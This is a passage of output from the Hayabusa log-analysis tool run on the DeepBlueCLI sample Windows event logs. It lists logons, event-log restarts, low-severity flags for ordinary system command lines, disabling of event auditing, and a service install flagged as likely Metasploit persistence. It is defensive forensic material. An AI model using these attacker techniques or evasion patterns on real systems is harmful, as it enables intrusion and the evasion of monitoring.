3362016-08-18 23:47:04.676 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6831f | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3372016-08-18 23:47:04.676 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6832b | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3382016-08-18 23:47:20.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3392016-08-18 23:47:20.053 +09:00IE10Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x6832brules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3402016-08-18 23:47:36.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3412016-08-18 23:47:36.671 +09:00IE10Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3422016-08-18 23:47:37.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3432016-08-18 23:47:38.430 +09:00IE10Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3442016-08-18 23:47:38.430 +09:00IE10Win74672infoAdmin LogonUser: IEUser | LID: 0x1dc1erules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3452016-08-18 23:47:38.430 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1dc1e | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3462016-08-18 23:47:38.430 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ee41 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3472016-08-18 23:48:31.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3482016-08-18 23:48:31.289 +09:00IE10Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x1ee41rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3492016-08-18 23:49:38.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3502016-08-18 23:49:38.281 +09:00IE10Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3512016-08-18 23:49:39.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3522016-08-18 23:49:40.000 +09:00IE10Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3532016-08-18 23:49:40.000 +09:00IE10Win74672infoAdmin LogonUser: IEUser | LID: 0x1b293rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3542016-08-18 23:49:40.000 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b293 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3552016-08-18 23:49:40.000 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b2fd | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3562016-08-18 23:49:42.406 +09:00IE10Win77045infoNew Service InstalledName: Intel(R) PRO/1000 NDIS 6 Adapter Driver | Path: system32\DRIVERS\E1G60I32.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3572016-08-19 00:28:28.043 +09:00IE10Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x1b2fdrules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3582016-08-19 00:28:38.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3592016-08-19 00:29:27.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3602016-08-19 00:29:27.609 +09:00IE10Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3612016-08-19 00:29:28.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3622016-08-19 00:29:29.859 +09:00IE10Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3632016-08-19 00:29:29.859 +09:00IE10Win74672infoAdmin LogonUser: IEUser | LID: 0x1aae1rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3642016-08-19 00:29:29.859 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1aae1 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3652016-08-19 00:29:29.859 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1af2f | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3662016-08-19 00:32:23.580 +09:00IE10Win77045infoNew Service InstalledName: Google Update Service (gupdate) | Path: "C:\Program Files\Google\Update\GoogleUpdate.exe" /svc | Account: LocalSystem | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3672016-08-19 00:32:23.595 +09:00IE10Win77045infoNew Service InstalledName: Google Update Service (gupdatem) | Path: "C:\Program Files\Google\Update\GoogleUpdate.exe" /medsvc | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3682016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3692016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3702016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3712016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3722016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3732016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3742016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3752016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3762016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3772016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3782016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3792016-08-19 00:43:46.923 +09:00IE10Win74719highEvasDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3802016-08-19 01:52:36.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3812016-08-19 01:52:58.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3822016-08-19 01:52:58.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3832016-08-19 01:58:34.966 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x190 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3842016-08-19 01:58:34.997 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3852016-08-19 02:06:20.341 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\RunDll32.exe" "C:\Windows\system32\WerConCpl.dll", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0xb44 | User: IEUser | LID: 0x970d9rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3862016-08-19 02:34:07.763 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\winsat.exe formal -log -cancelevent 850b2fce-84b7-4abd-a41f-f04c912c6e37 | Path: C:\Windows\System32\WinSAT.exe | PID: 0xfe4 | User: IEUser | LID: 0x970a9rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3872016-08-19 02:35:08.751 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" -IdleTask -TaskName MpIdleTask | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x600 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3882016-08-19 02:37:08.229 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3892016-08-19 02:44:08.468 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3902016-08-19 02:44:08.499 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\itulqket.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x34c | User: IEUser | LID: 0x970a9rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3912016-08-19 02:44:08.609 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\ssh63wbw.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xa50 | User: IEUser | LID: 0x970a9rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3922016-08-19 02:44:08.765 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\pcbguge2.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xee8 | User: IEUser | LID: 0x970a9rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3932016-08-19 02:44:08.859 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\uacrfkow.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x7d8 | User: IEUser | LID: 0x970a9rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3942016-08-19 02:44:09.484 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\PING.EXE" "Local CMOS Clock" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x944 | User: IEUser | LID: 0x970a9rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3952016-08-19 02:44:09.499 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\PING.EXE" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe70 | User: IEUser | LID: 0x970a9rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3962016-08-19 03:07:37.968 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3972016-08-19 03:46:19.937 +09:00IE10Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3982016-08-19 03:46:20.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3992016-08-19 03:46:20.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4002016-08-19 03:57:20.843 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc80 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4012016-08-19 03:57:21.015 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8f4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4022016-08-19 04:05:34.164 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x92c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4032016-08-19 04:05:34.195 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4042016-08-19 04:55:29.037 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xd20 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4052016-08-19 04:55:30.037 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20160818195530.log C:\Windows\Logs\CBS\CbsPersist_20160818195530.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4062016-08-19 04:55:33.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4072016-08-19 04:55:49.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4082016-08-19 04:55:50.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4092016-08-19 04:55:51.989 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x71c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4102016-08-19 04:55:52.176 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4112016-08-19 04:55:52.364 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4122016-08-19 04:55:53.255 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xbc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4132016-08-19 04:55:57.149 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Wallpaper\autologon.bat" " | Path: C:\Windows\System32\cmd.exe | PID: 0xa5c | User: IEUser | LID: 0x1ceafrules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4142016-08-19 04:55:57.542 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xa7c | User: IEUser | LID: 0x1ceafrules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4152016-08-19 04:55:59.915 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4162016-08-19 04:56:34.967 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4172016-08-19 04:56:34.999 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdd0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4182016-08-19 04:58:48.497 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4192016-08-19 04:58:48.512 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{A4B07E49-6567-4FB8-8D39-01920E3B2357} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd14 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4202016-08-19 04:59:33.224 +09:00IE10Win77045mediumPersisPossible Metasploit Service InstalledSvc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4212016-08-19 04:59:33.224 +09:00IE10Win77045highPersisMalicious Service Possibly InstalledSvc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
